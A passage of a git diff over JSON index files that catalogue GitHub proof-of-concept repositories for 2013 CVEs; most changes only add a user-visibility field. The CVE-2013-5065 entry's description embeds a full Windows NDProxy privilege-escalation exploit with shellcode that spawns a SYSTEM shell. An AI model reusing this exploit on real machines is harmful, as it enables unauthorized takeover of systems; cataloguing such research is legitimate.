"html_url": "https:\/\/github.com\/GrrrDog", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/GrrrDog\/ACEDcup", "description": "Payload generator for Java Binary Deserialization attack with Commons FileUpload (CVE-2013-2186)", @@ -37,7 +38,8 @@ "login": "sa1g0n1337", "id": 24432650, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24432650?v=4", - "html_url": "https:\/\/github.com\/sa1g0n1337" + "html_url": "https:\/\/github.com\/sa1g0n1337", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/sa1g0n1337\/Payload_CVE_2013_2186", "description": "Code generate payload for CVE-2013-2186", @@ -67,7 +69,8 @@ "login": "sa1g0n1337", "id": 24432650, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24432650?v=4", - "html_url": "https:\/\/github.com\/sa1g0n1337" + "html_url": "https:\/\/github.com\/sa1g0n1337", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/sa1g0n1337\/CVE_2013_2186", "description": "Source code for CVE-2013-2186", diff --git a/2013/CVE-2013-2217.json b/2013/CVE-2013-2217.json index 3c838f6daa..2688662f75 100644 --- a/2013/CVE-2013-2217.json +++ b/2013/CVE-2013-2217.json @@ -7,7 +7,8 @@ "login": "Osirium", "id": 475594, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/475594?v=4", - "html_url": "https:\/\/github.com\/Osirium" + "html_url": "https:\/\/github.com\/Osirium", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Osirium\/suds", "description": " Clone of suds 0.4 + suds-0.4-CVE-2013-2217.patch", diff --git a/2013/CVE-2013-225.json b/2013/CVE-2013-225.json index 941fa721ca..576a31279a 100644 --- a/2013/CVE-2013-225.json +++ b/2013/CVE-2013-225.json @@ -7,7 +7,8 @@ "login": "PentestinGxRoot", "id": 22859215, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22859215?v=4", - "html_url": "https:\/\/github.com\/PentestinGxRoot" + "html_url": "https:\/\/github.com\/PentestinGxRoot", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/PentestinGxRoot\/ShellEvil", "description": "Struts 2 DefaultActionMapper Interactive Shell Exploit for CVE-2013-225 [S2-016]", diff --git a/2013/CVE-2013-2251.json b/2013/CVE-2013-2251.json index ff08481d70..c53aaac4ec 100644 --- a/2013/CVE-2013-2251.json +++ b/2013/CVE-2013-2251.json @@ -7,7 +7,8 @@ "login": "nth347", "id": 20441996, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20441996?v=4", - "html_url": "https:\/\/github.com\/nth347" + "html_url": "https:\/\/github.com\/nth347", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/nth347\/CVE-2013-2251", "description": "Vulnerable environment of CVE-2013-2251 (S2-016) for testing", diff --git a/2013/CVE-2013-2595.json b/2013/CVE-2013-2595.json index 67d4aa843a..b757961c1a 100644 --- a/2013/CVE-2013-2595.json +++ b/2013/CVE-2013-2595.json @@ -7,7 +7,8 @@ "login": "fi01", "id": 3073214, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3073214?v=4", - "html_url": "https:\/\/github.com\/fi01" + "html_url": "https:\/\/github.com\/fi01", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/fi01\/libmsm_cameraconfig_exploit", "description": "CVE-2013-2595 exploit", diff --git a/2013/CVE-2013-2596.json b/2013/CVE-2013-2596.json index da9c9cd3a1..dfd8565f63 100644 --- a/2013/CVE-2013-2596.json +++ b/2013/CVE-2013-2596.json @@ -7,7 +7,8 @@ "login": "hiikezoe", "id": 188175, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/188175?v=4", - "html_url": "https:\/\/github.com\/hiikezoe" + "html_url": "https:\/\/github.com\/hiikezoe", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/hiikezoe\/libfb_mem_exploit", "description": "CVE-2013-2596 exploit for android", diff --git a/2013/CVE-2013-2597.json b/2013/CVE-2013-2597.json index d9f18afa35..79fd256b22 100644 --- a/2013/CVE-2013-2597.json +++ b/2013/CVE-2013-2597.json @@ -7,7 +7,8 @@ "login": "fi01", "id": 3073214, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3073214?v=4", - "html_url": "https:\/\/github.com\/fi01" + "html_url": "https:\/\/github.com\/fi01", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/fi01\/libmsm_acdb_exploit", "description": "CVE-2013-2597 exploit", diff --git a/2013/CVE-2013-2729.json b/2013/CVE-2013-2729.json index 03e1e46161..a89b706e72 100644 --- a/2013/CVE-2013-2729.json +++ b/2013/CVE-2013-2729.json @@ -7,7 +7,8 @@ "login": "feliam", "id": 1017522, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1017522?v=4", - "html_url": "https:\/\/github.com\/feliam" + "html_url": "https:\/\/github.com\/feliam", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/feliam\/CVE-2013-2729", "description": null, diff --git a/2013/CVE-2013-2730.json b/2013/CVE-2013-2730.json index 7b4e3e0fc6..edc3e7062a 100644 --- a/2013/CVE-2013-2730.json +++ b/2013/CVE-2013-2730.json @@ -7,7 +7,8 @@ "login": "feliam", "id": 1017522, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1017522?v=4", - "html_url": "https:\/\/github.com\/feliam" + "html_url": "https:\/\/github.com\/feliam", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/feliam\/CVE-2013-2730", "description": null, diff --git a/2013/CVE-2013-2842.json b/2013/CVE-2013-2842.json index e0e0b65699..efc742a2ef 100644 --- a/2013/CVE-2013-2842.json +++ b/2013/CVE-2013-2842.json @@ -7,7 +7,8 @@ "login": "173210", "id": 1689097, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1689097?v=4", - "html_url": "https:\/\/github.com\/173210" + "html_url": "https:\/\/github.com\/173210", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/173210\/spider", "description": "Spider Exploit with CVE-2013-2842", diff --git a/2013/CVE-2013-2977.json b/2013/CVE-2013-2977.json index c6c8a01882..62ce979faf 100644 --- a/2013/CVE-2013-2977.json +++ b/2013/CVE-2013-2977.json @@ -7,7 +7,8 @@ "login": "defrancescojp", "id": 59481050, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59481050?v=4", - "html_url": "https:\/\/github.com\/defrancescojp" + "html_url": "https:\/\/github.com\/defrancescojp", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/defrancescojp\/CVE-2013-2977", "description": "IBM Lotus Notes PNG Integer Overflow", diff --git a/2013/CVE-2013-3214.json b/2013/CVE-2013-3214.json index 91a93878e6..7610e63cb2 100644 --- a/2013/CVE-2013-3214.json +++ b/2013/CVE-2013-3214.json @@ -7,7 +7,8 @@ "login": "shadofren", "id": 8515519, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8515519?v=4", - "html_url": "https:\/\/github.com\/shadofren" + "html_url": "https:\/\/github.com\/shadofren", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/shadofren\/CVE-2013-3214", "description": "CVE-2013-3214", diff --git a/2013/CVE-2013-3319.json b/2013/CVE-2013-3319.json index 7219c7ec93..fef8a9430f 100644 --- a/2013/CVE-2013-3319.json +++ b/2013/CVE-2013-3319.json @@ -7,7 +7,8 @@ "login": "devoteam-cybertrust", "id": 4949243, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4949243?v=4", - "html_url": "https:\/\/github.com\/devoteam-cybertrust" + "html_url": "https:\/\/github.com\/devoteam-cybertrust", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/devoteam-cybertrust\/cve-2013-3319", "description": "metasploit module for CVE-2013-3319 \/ SAP Security Note 1816536", diff --git a/2013/CVE-2013-3651.json b/2013/CVE-2013-3651.json index b6a32e3740..687a77ec38 100644 --- a/2013/CVE-2013-3651.json +++ b/2013/CVE-2013-3651.json @@ -7,7 +7,8 @@ "login": "motikan2010", "id": 3177297, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3177297?v=4", - "html_url": "https:\/\/github.com\/motikan2010" + "html_url": "https:\/\/github.com\/motikan2010", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/motikan2010\/CVE-2013-3651", "description": "CVE-2013-3651 PoC - EC-CUBE 2", diff --git a/2013/CVE-2013-3660.json b/2013/CVE-2013-3660.json index c275700059..5675e354f2 100644 --- a/2013/CVE-2013-3660.json +++ b/2013/CVE-2013-3660.json @@ -7,7 +7,8 @@ "login": "ExploitCN", "id": 98264245, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98264245?v=4", - "html_url": "https:\/\/github.com\/ExploitCN" + "html_url": "https:\/\/github.com\/ExploitCN", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/ExploitCN\/CVE-2013-3660-x64-WIN7", "description": "CVE-2013-3660的x64 win7平台EXP源代码,成功率100%。", diff --git a/2013/CVE-2013-3664.json b/2013/CVE-2013-3664.json index 95bf846f1c..6569d02ff6 100644 --- a/2013/CVE-2013-3664.json +++ b/2013/CVE-2013-3664.json @@ -7,7 +7,8 @@ "login": "defrancescojp", "id": 59481050, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59481050?v=4", - "html_url": "https:\/\/github.com\/defrancescojp" + "html_url": "https:\/\/github.com\/defrancescojp", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/defrancescojp\/CVE-2013-3664_MAC", "description": "Sketchup MAC Pict Material Palette Stack Corruption", @@ -37,7 +38,8 @@ "login": "defrancescojp", "id": 59481050, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59481050?v=4", - "html_url": "https:\/\/github.com\/defrancescojp" + "html_url": "https:\/\/github.com\/defrancescojp", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/defrancescojp\/CVE-2013-3664_BMP", "description": "Sketchup BMP Material RLE4 Heap Overflow", diff --git a/2013/CVE-2013-3900.json b/2013/CVE-2013-3900.json index 53ef72ad0a..afd50119ea 100644 --- a/2013/CVE-2013-3900.json +++ b/2013/CVE-2013-3900.json @@ -7,7 +7,8 @@ "login": "snoopopsec", "id": 92749864, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92749864?v=4", - "html_url": "https:\/\/github.com\/snoopopsec" + "html_url": "https:\/\/github.com\/snoopopsec", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/snoopopsec\/vulnerability-CVE-2013-3900", "description": "Remediation for CVE-2013-3900", @@ -37,7 +38,8 @@ "login": "CyberCondor", "id": 116996274, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/116996274?v=4", - "html_url": "https:\/\/github.com\/CyberCondor" + "html_url": "https:\/\/github.com\/CyberCondor", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/CyberCondor\/Fix-WinVerifyTrustSignatureValidationVuln", "description": "Fix WinVerifyTrust Signature Validation Vulnerability, CVE-2013-3900, QID-378332", @@ -67,7 +69,8 @@ "login": "Securenetology", "id": 89155495, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89155495?v=4", - "html_url": "https:\/\/github.com\/Securenetology" + "html_url": "https:\/\/github.com\/Securenetology", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Securenetology\/CVE-2013-3900", "description": null, @@ -97,7 +100,8 @@ "login": "OtisSymbos", "id": 78093502, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78093502?v=4", - "html_url": "https:\/\/github.com\/OtisSymbos" + "html_url": "https:\/\/github.com\/OtisSymbos", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/OtisSymbos\/CVE-2013-3900-WinTrustVerify", "description": "Powershell script that checks for cert padding in the Windows Registry and adds it if it does not exist. Meant to resolve the WinTrustVerify Vulnerability.", diff --git a/2013/CVE-2013-4002.json b/2013/CVE-2013-4002.json index fc323644f5..e2bd5f51a1 100644 --- a/2013/CVE-2013-4002.json +++ b/2013/CVE-2013-4002.json @@ -7,7 +7,8 @@ "login": "tafamace", "id": 45160113, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45160113?v=4", - "html_url": "https:\/\/github.com\/tafamace" + "html_url": "https:\/\/github.com\/tafamace", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/tafamace\/CVE-2013-4002", "description": null, diff --git a/2013/CVE-2013-4175.json b/2013/CVE-2013-4175.json index 7477b4e28a..d3e121343b 100644 --- a/2013/CVE-2013-4175.json +++ b/2013/CVE-2013-4175.json @@ -7,7 +7,8 @@ "login": "hartwork", "id": 1577132, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1577132?v=4", - "html_url": "https:\/\/github.com\/hartwork" + "html_url": "https:\/\/github.com\/hartwork", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/hartwork\/mysecureshell-issues", "description": " :unlock: CVE-2013-4175 -- Local denial of service demo (C)", diff --git a/2013/CVE-2013-4348.json b/2013/CVE-2013-4348.json index 549c244b92..67cbf17acd 100644 --- a/2013/CVE-2013-4348.json +++ b/2013/CVE-2013-4348.json @@ -7,7 +7,8 @@ "login": "bl4ck5un", "id": 2434648, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2434648?v=4", - "html_url": "https:\/\/github.com\/bl4ck5un" + "html_url": "https:\/\/github.com\/bl4ck5un", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/bl4ck5un\/cve-2013-4348", "description": "DOS (infinite loop) attack via a small value in the IHL field of a packet with IPIP encapsulation", diff --git a/2013/CVE-2013-4362.json b/2013/CVE-2013-4362.json index a28555cf5f..ce7b610223 100644 --- a/2013/CVE-2013-4362.json +++ b/2013/CVE-2013-4362.json @@ -7,7 +7,8 @@ "login": "notclement", "id": 19283318, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19283318?v=4", - "html_url": "https:\/\/github.com\/notclement" + "html_url": "https:\/\/github.com\/notclement", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/notclement\/Automatic-davfs2-1.4.6-1.4.7-Local-Privilege-Escalation", "description": "Automatically exploit systems with vulnerable davfs2 (CVE-2013-4362)", diff --git a/2013/CVE-2013-4378.json b/2013/CVE-2013-4378.json index 01eecd1b99..c8aa2367a7 100644 --- a/2013/CVE-2013-4378.json +++ b/2013/CVE-2013-4378.json @@ -7,7 +7,8 @@ "login": "theratpack", "id": 5540319, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5540319?v=4", - "html_url": "https:\/\/github.com\/theratpack" + "html_url": "https:\/\/github.com\/theratpack", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/theratpack\/grails-javamelody-sample-app", "description": " Grails sample application using the Javamelody 1.44 plugin to illustrate the CVE-2013-4378 vulnerability.", @@ -37,7 +38,8 @@ "login": "epicosy", "id": 30272775, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30272775?v=4", - "html_url": "https:\/\/github.com\/epicosy" + "html_url": "https:\/\/github.com\/epicosy", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/epicosy\/VUL4J-50", "description": "javamelody\/javamelody with CVE-2013-4378", diff --git a/2013/CVE-2013-4434.json b/2013/CVE-2013-4434.json index 8cf6c757a5..404f320b48 100644 --- a/2013/CVE-2013-4434.json +++ b/2013/CVE-2013-4434.json @@ -7,7 +7,8 @@ "login": "styx00", "id": 17887949, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17887949?v=4", - "html_url": "https:\/\/github.com\/styx00" + "html_url": "https:\/\/github.com\/styx00", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/styx00\/Dropbear_CVE-2013-4434", "description": "Dropbear user enumeration (CVE-2013-4434) PoC", diff --git a/2013/CVE-2013-4547.json b/2013/CVE-2013-4547.json index f2bbd8f2d8..7827a24d8c 100644 --- a/2013/CVE-2013-4547.json +++ b/2013/CVE-2013-4547.json @@ -7,7 +7,8 @@ "login": "cyberharsh", "id": 57433814, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57433814?v=4", - "html_url": "https:\/\/github.com\/cyberharsh" + "html_url": "https:\/\/github.com\/cyberharsh", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/cyberharsh\/Nginx-CVE-2013-4547", "description": null, diff --git a/2013/CVE-2013-4710.json b/2013/CVE-2013-4710.json index b5b58a9673..95ac28164c 100644 --- a/2013/CVE-2013-4710.json +++ b/2013/CVE-2013-4710.json @@ -7,7 +7,8 @@ "login": "Snip3R69", "id": 76834257, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76834257?v=4", - "html_url": "https:\/\/github.com\/Snip3R69" + "html_url": "https:\/\/github.com\/Snip3R69", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Snip3R69\/CVE-2013-4710-WebView-RCE-Vulnerability", "description": "Android 3.0 through 4.1.x on Disney Mobile, eAccess, KDDI, NTT DOCOMO, SoftBank, and other devices does not properly implement the WebView class, which allows remote attackers to execute arbitrary methods of Java objects or cause a denial of service (reboot) via a crafted web page, as demonstrated by use of the WebView.addJavascriptInterface method, a related issue to CVE-2012-6636.", diff --git a/2013/CVE-2013-4730.json b/2013/CVE-2013-4730.json index 77a0dbf6c9..50af273a33 100644 --- a/2013/CVE-2013-4730.json +++ b/2013/CVE-2013-4730.json @@ -7,7 +7,8 @@ "login": "t0rt3ll1n0", "id": 67228133, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67228133?v=4", - "html_url": "https:\/\/github.com\/t0rt3ll1n0" + "html_url": "https:\/\/github.com\/t0rt3ll1n0", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/t0rt3ll1n0\/PCmanBoF", "description": "A very simple buffer overflow using CVE-2013-4730 against PCman's FTP server", diff --git a/2013/CVE-2013-4784.json b/2013/CVE-2013-4784.json index 3fd7dfae98..a665a5bd34 100644 --- a/2013/CVE-2013-4784.json +++ b/2013/CVE-2013-4784.json @@ -7,7 +7,8 @@ "login": "alexoslabs", "id": 2213391, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2213391?v=4", - "html_url": "https:\/\/github.com\/alexoslabs" + "html_url": "https:\/\/github.com\/alexoslabs", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/alexoslabs\/ipmitest", "description": "Shell script for testing the IPMI cipher type zero authentication bypass vulnerability (CVE-2013-4784)", diff --git a/2013/CVE-2013-4786.json b/2013/CVE-2013-4786.json index 026e03e725..bfcc9a10c1 100644 --- a/2013/CVE-2013-4786.json +++ b/2013/CVE-2013-4786.json @@ -7,7 +7,8 @@ "login": "fin3ss3g0d", "id": 62859381, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62859381?v=4", - "html_url": "https:\/\/github.com\/fin3ss3g0d" + "html_url": "https:\/\/github.com\/fin3ss3g0d", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/fin3ss3g0d\/CosmicRakp", "description": "CVE-2013-4786 Go exploitation tool", diff --git a/2013/CVE-2013-5065.json b/2013/CVE-2013-5065.json index 01f2c0bc46..b0c54caa15 100644 --- a/2013/CVE-2013-5065.json +++ b/2013/CVE-2013-5065.json @@ -7,7 +7,8 @@ "login": "Friarfukd", "id": 6127925, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6127925?v=4", - "html_url": "https:\/\/github.com\/Friarfukd" + "html_url": "https:\/\/github.com\/Friarfukd", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Friarfukd\/RobbinHood", "description": "# NDPROXY Local SYSTEM privilege escalation # http:\/\/www.offensive-security.com # Tested on Windows XP SP3 # http:\/\/www.offensive-security.com\/vulndev\/ndproxy-local-system-exploit-cve-2013-5065\/     # Original crash ... null pointer dereference # Access violation - code c0000005 (!!! second chance !!!) # 00000038 ??              ???   from ctypes import * from ctypes.wintypes import * import os, sys   kernel32 = windll.kernel32 ntdll = windll.ntdll   GENERIC_READ     = 0x80000000 GENERIC_WRITE    = 0x40000000 FILE_SHARE_READ  = 0x00000001 FILE_SHARE_WRITE = 0x00000002 NULL = 0x0 OPEN_EXISTING = 0x3 PROCESS_VM_WRITE            = 0x0020 PROCESS_VM_READ             = 0x0010 MEM_COMMIT                  = 0x00001000 MEM_RESERVE                 = 0x00002000 MEM_FREE                    = 0x00010000 PAGE_EXECUTE_READWRITE      = 0x00000040 PROCESS_ALL_ACCESS          = 2097151 FORMAT_MESSAGE_FROM_SYSTEM  = 0x00001000 baseadd = c_int(0x00000001) MEMRES = (0x1000 | 0x2000) MEM_DECOMMIT = 0x4000 PAGEEXE = 0x00000040 null_size = c_int(0x1000) STATUS_SUCCESS = 0   def log(msg):     print msg   def getLastError():     \"\"\"[-] Format GetLastError\"\"\"     buf = create_string_buffer(2048)     if kernel32.FormatMessageA(FORMAT_MESSAGE_FROM_SYSTEM, NULL,             kernel32.GetLastError(), 0,             buf, sizeof(buf), NULL):         log(buf.value)     else:         log(\"[-] Unknown Error\")   print \"[*] Microsoft Windows NDProxy CVE-2013-5065 0day\" print \"[*] Vulnerability found in the wild\" print \"[*] Coded by Offensive Security\"                 tmp = (\"\\x00\"*4)*5 + \"\\x25\\x01\\x03\\x07\" + \"\\x00\"*4 + \"\\x34\\x00\\x00\\x00\" + \"\\x00\"*(84-24) InBuf = c_char_p(tmp)   dwStatus = ntdll.NtAllocateVirtualMemory(0xFFFFFFFF, byref(baseadd), 0x0, byref(null_size), MEMRES, PAGEEXE) if dwStatus != STATUS_SUCCESS:     print \"[+] Something went wrong while allocating the null paged memory: %s\" % dwStatus     getLastError() written = c_ulong() sh = \"\\x90\\x33\\xC0\\x64\\x8B\\x80\\x24\\x01\\x00\\x00\\x8B\\x40\\x44\\x8B\\xC8\\x8B\\x80\\x88\\x00\\x00\\x00\\x2D\\x88\\x00\\x00\\x00\\x83\\xB8\\x84\\x00\\x00\\x00\\x04\\x75\\xEC\\x8B\\x90\\xC8\\x00\\x00\\x00\\x89\\x91\\xC8\\x00\\x00\\x00\\xC3\" sc = \"\\x90\"*0x38 + \"\\x3c\\x00\\x00\\x00\" + \"\\x90\"*4 + sh + \"\\xcc\"*(0x400-0x3c-4-len(sh)) alloc = kernel32.WriteProcessMemory(0xFFFFFFFF, 0x00000001, sc, 0x400, byref(written)) if alloc == 0:     print \"[+] Something went wrong while writing our junk to the null paged memory: %s\" % alloc     getLastError()   dwRetBytes = DWORD(0) DEVICE_NAME   = \"\\\\\\\\.\\\\NDProxy\" hdev = kernel32.CreateFileA(DEVICE_NAME, 0, 0, None, OPEN_EXISTING , 0, None) if hdev == -1:     print \"[-] Couldn't open the device... :(\"     sys.exit() kernel32.DeviceIoControl(hdev, 0x8fff23cc, InBuf, 0x54, InBuf, 0x24, byref(dwRetBytes), 0) kernel32.CloseHandle(hdev) print \"[+] Spawning SYSTEM Shell...\" os.system(\"start \/d \\\"C:\\\\windows\\\\system32\\\" cmd.exe\")", diff --git a/2013/CVE-2013-5211.json b/2013/CVE-2013-5211.json index ce1d3725c7..6cb83d3fd3 100644 --- a/2013/CVE-2013-5211.json +++ b/2013/CVE-2013-5211.json @@ -7,7 +7,8 @@ "login": "dani87", "id": 4827873, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4827873?v=4", - "html_url": "https:\/\/github.com\/dani87" + "html_url": "https:\/\/github.com\/dani87", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/dani87\/ntpscanner", "description": "Scans NTP servers for CVE-2013-5211 NTP DDOS amplification vulnerability.", @@ -37,7 +38,8 @@ "login": "suedadam", "id": 3879307, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3879307?v=4", - "html_url": "https:\/\/github.com\/suedadam" + "html_url": "https:\/\/github.com\/suedadam", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/suedadam\/ntpscanner", "description": "NTP monlist scanner CVE-2013-5211", @@ -67,7 +69,8 @@ "login": "sepehrdaddev", "id": 26747519, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26747519?v=4", - "html_url": "https:\/\/github.com\/sepehrdaddev" + "html_url": "https:\/\/github.com\/sepehrdaddev", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/sepehrdaddev\/ntpdos", "description": "PoC for distributed NTP reflection DoS (CVE-2013-5211)", @@ -107,7 +110,8 @@ "login": "0xhav0c", "id": 96983443, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96983443?v=4", - "html_url": "https:\/\/github.com\/0xhav0c" + "html_url": "https:\/\/github.com\/0xhav0c", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/0xhav0c\/CVE-2013-5211", "description": null, @@ -137,7 +141,8 @@ "login": "requiempentest", "id": 180197370, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/180197370?v=4", - "html_url": "https:\/\/github.com\/requiempentest" + "html_url": "https:\/\/github.com\/requiempentest", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/requiempentest\/-exploit-check-CVE-2013-5211", "description": "check and exploit for NTP vuln CVE-2013-5211", @@ -167,7 +172,8 @@ "login": "requiempentest", "id": 180197370, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/180197370?v=4", - "html_url": "https:\/\/github.com\/requiempentest" + "html_url": "https:\/\/github.com\/requiempentest", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/requiempentest\/NTP_CVE-2013-5211", "description": "Exploit and check CVE-2013-5211", diff --git a/2013/CVE-2013-5664.json b/2013/CVE-2013-5664.json index fac45b54dc..5c2bd7f8de 100644 --- a/2013/CVE-2013-5664.json +++ b/2013/CVE-2013-5664.json @@ -7,7 +7,8 @@ "login": "phusion", "id": 830588, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/830588?v=4", - "html_url": "https:\/\/github.com\/phusion" + "html_url": "https:\/\/github.com\/phusion", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/phusion\/rails-cve-2012-5664-test", "description": "Demo app showing how the Rails CVE-2013-5664 vulnerability works.", diff --git a/2013/CVE-2013-5842.json b/2013/CVE-2013-5842.json index 92a3ff9e85..7b3568d2fa 100644 --- a/2013/CVE-2013-5842.json +++ b/2013/CVE-2013-5842.json @@ -7,7 +7,8 @@ "login": "guhe120", "id": 5601255, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5601255?v=4", - "html_url": "https:\/\/github.com\/guhe120" + "html_url": "https:\/\/github.com\/guhe120", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/guhe120\/CVE-2013-5842", "description": null, diff --git a/2013/CVE-2013-6117.json b/2013/CVE-2013-6117.json index abd6c01f9d..48e1427adb 100644 --- a/2013/CVE-2013-6117.json +++ b/2013/CVE-2013-6117.json @@ -7,7 +7,8 @@ "login": "milo2012", "id": 905335, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/905335?v=4", - "html_url": "https:\/\/github.com\/milo2012" + "html_url": "https:\/\/github.com\/milo2012", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/milo2012\/CVE-2013-6117", "description": "CVE-2013-6117", diff --git a/2013/CVE-2013-6282.json b/2013/CVE-2013-6282.json index df81cf9732..b0bf0fd357 100644 --- a/2013/CVE-2013-6282.json +++ b/2013/CVE-2013-6282.json @@ -7,7 +7,8 @@ "login": "fi01", "id": 3073214, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3073214?v=4", - "html_url": "https:\/\/github.com\/fi01" + "html_url": "https:\/\/github.com\/fi01", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/fi01\/libput_user_exploit", "description": "CVE-2013-6282 exploit", @@ -37,7 +38,8 @@ "login": "fi01", "id": 3073214, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3073214?v=4", - "html_url": "https:\/\/github.com\/fi01" + "html_url": "https:\/\/github.com\/fi01", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/fi01\/libget_user_exploit", "description": "CVE-2013-6282 exploit", @@ -67,7 +69,8 @@ "login": "jeboo", "id": 1755205, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1755205?v=4", - "html_url": "https:\/\/github.com\/jeboo" + "html_url": "https:\/\/github.com\/jeboo", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/jeboo\/bypasslkm", "description": "Using CVE-2013-6282 to bypass Samsung kernel module authentication", @@ -97,7 +100,8 @@ "login": "timwr", "id": 684924, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/684924?v=4", - "html_url": "https:\/\/github.com\/timwr" + "html_url": "https:\/\/github.com\/timwr", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/timwr\/CVE-2013-6282", "description": "CVE-2013-6282 proof of concept for Android", diff --git a/2013/CVE-2013-6375.json b/2013/CVE-2013-6375.json index 74a22de26d..029708aff4 100644 --- a/2013/CVE-2013-6375.json +++ b/2013/CVE-2013-6375.json @@ -7,7 +7,8 @@ "login": "bl4ck5un", "id": 2434648, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2434648?v=4", - "html_url": "https:\/\/github.com\/bl4ck5un" + "html_url": "https:\/\/github.com\/bl4ck5un", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/bl4ck5un\/cve-2013-6375", "description": "Xen 4.2.x and 4.3.x, when using Intel VT-d for PCI passthrough, does not properly flush the TLB after clearing a present translation table entry, which allows local guest administrators to cause a denial of service or gain privileges via unspecified vectors related to an \"inverted boolean parameter.\"", diff --git a/2013/CVE-2013-6490.json b/2013/CVE-2013-6490.json index 14ecd62b0d..786b0fc8f3 100644 --- a/2013/CVE-2013-6490.json +++ b/2013/CVE-2013-6490.json @@ -7,7 +7,8 @@ "login": "Everdoh", "id": 17012809, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17012809?v=4", - "html_url": "https:\/\/github.com\/Everdoh" + "html_url": "https:\/\/github.com\/Everdoh", + 